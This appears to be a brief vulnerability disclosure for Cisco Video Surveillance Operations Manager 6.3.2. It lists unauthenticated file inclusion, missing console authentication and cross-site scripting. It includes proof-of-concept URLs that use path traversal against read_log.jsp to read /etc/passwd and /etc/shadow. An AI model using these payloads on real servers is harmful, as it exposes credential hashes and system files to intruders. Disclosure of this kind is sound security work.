#1- The application is vulnerable to Local file inclusion
read_log.jsp and read_log.dep not validate the name and location of the log file , un authenticated remote attacker can perform this
read_log.dep
POC:
http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd
http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow
#####################################################################
#2- The application is vulnerable to local file inclusion
select and display log not validate the log file names , If attacker pass /etc/passwd through the http post request system will display it as log file
POC:
http://serverip/monitor/logselect.php
#####################################################################
#3 Cisco Video Surveillance Operations Manager Version 6.3.2 doesn't perform the proper authentication for the management and view console, Remote attacker can gain access to the system and view the attached cameras without authentication
POC:
#####################################################################
#4 Application is vulnerable to XSS
The web application doesn't perform validation for the inputs/outputs for many of its pages so its vulnerable to XSS attacks